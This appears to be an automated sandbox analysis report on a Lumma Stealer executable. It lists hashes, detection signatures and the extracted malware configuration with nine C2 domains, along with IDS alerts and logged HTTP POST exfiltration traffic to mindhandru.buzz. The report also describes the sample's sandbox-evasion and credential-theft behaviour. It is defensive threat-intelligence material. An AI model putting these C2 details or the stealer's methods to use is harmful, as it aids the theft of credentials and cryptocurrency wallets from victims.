Windows Analysis Report
zi042476Iv.exe

Overview

General Information

Sample name: zi042476Iv.exe (renamed because the original name is a hash value)
Original sample name: e5c73b43bd01bb3580af440576a00ad3.exe
Analysis ID: 1581216
MD5: e5c73b43bd01bb3580af440576a00ad3
SHA1: e77f4d19f5b74853fddf4e03f8e73d04a67eeef6
SHA256: 73530f53798c09139cbc44033cc2259de175bbc508819527137da458d0d4dd73
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • zi042476Iv.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\zi042476Iv.exe" MD5: E5C73B43BD01BB3580AF440576A00AD3)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration (LummaC):
{
  "C2 url": [
    "rebuildeso.buzz",
    "cashfuzysao.buzz",
    "scentniej.buzz",
    "hummskitnj.buzz",
    "appliacnesot.buzz",
    "prisonyfork.buzz",
    "mindhandru.buzz",
    "inherineau.buzz",
    "screwamusresz.buzz"
  ],
  "Build id": "LOGS11--LiveTraffic"
}
Yara matches (network capture):
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Yara matches (memory dumps and process memory):
Source | Rule | Description | Author | Strings
00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: zi042476Iv.exe PID: 6492 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: zi042476Iv.exe PID: 6492 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: zi042476Iv.exe PID: 6492 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T08:41:49.256104+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49712 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:51.309576+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49718 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:53.794022+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49724 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:56.056067+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49730 | 172.67.165.185 | 443 | TCP
2024-12-27T08:42:05.806654+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49752 | 172.67.165.185 | 443 | TCP
2024-12-27T08:42:08.405022+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49758 | 172.67.165.185 | 443 | TCP
2024-12-27T08:42:11.074170+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49763 | 104.21.11.101 | 443 | TCP
2024-12-27T08:42:15.831457+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49776 | 104.21.11.101 | 443 | TCP
2024-12-27T08:41:49.994221+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49712 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:52.092267+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49718 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:49.994221+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9 | 49712 | 172.67.165.185 | 443 | TCP
2024-12-27T08:41:52.092267+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.9 | 49718 | 172.67.165.185 | 443 | TCP
2024-12-27T08:42:09.163141+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49758 | 172.67.165.185 | 443 | TCP
2024-12-27T08:42:11.079369+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49763 | 104.21.11.101 | 443 | TCP
2024-12-27T08:42:11.079369+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.9 | 49763 | 104.21.11.101 | 443 | TCP

AV Detection

Source: zi042476Iv.exe | Avira: detected
Source: https://mindhandru.buzz/1 | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/lf | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apip | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apizZ | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/O | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/K | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apix | Avira URL Cloud: Label: malware
Source: zi042476Iv.exe.6492.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "cashfuzysao.buzz", "scentniej.buzz", "hummskitnj.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "mindhandru.buzz", "inherineau.buzz", "screwamusresz.buzz"], "Build id": "LOGS11--LiveTraffic"}
Source: zi042476Iv.exe | Virustotal: Detection: 52%
Source: zi042476Iv.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: zi042476Iv.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: mindhandru.buzz
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1617701405.0000000000161000.00000040.00000001.01000000.00000003.sdmp | String decryptor: LOGS11--LiveTraffic
Source: zi042476Iv.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49763 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49712 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49712 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49718 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49718 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49758 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49763 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49763 -> 104.21.11.101:443
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Joe Sandbox View | IP Address: 172.67.165.185
Source: Joe Sandbox View | IP Address: 104.21.11.101
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49724 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49712 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49758 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49718 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49730 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49763 -> 104.21.11.101:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49752 -> 172.67.165.185:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 53; Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=3RZK0SB31R8T983C3ZH; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 12857; Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=QDB45LVK03BQP; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 15039; Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=8IC5CEH6; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20525; Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=X5992ZCBKQN2H; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1209; Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=Q9LXEUVN8EZW59MC; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 584458; Host: mindhandru.buzz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: mindhandru.buzz
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.000000000133D000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1617123572.000000000134A000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550699749.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microP
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: zi042476Iv.exe, 00000000.00000002.1619925358.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/1
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/K
                Source: zi042476Iv.exe, 00000000.00000003.1527140960.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526983311.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/O
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551405833.0000000005CCC000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1617123572.000000000135D000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1530254887.000000000135A000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1555179762.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apip
                Source: zi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apix
                Source: zi042476Iv.exe, 00000000.00000003.1617123572.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apizZ
                Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1555179762.000000000136F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/d
                Source: zi042476Iv.exe, 00000000.00000003.1550520984.0000000005CC4000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550598616.0000000005CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/lf
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
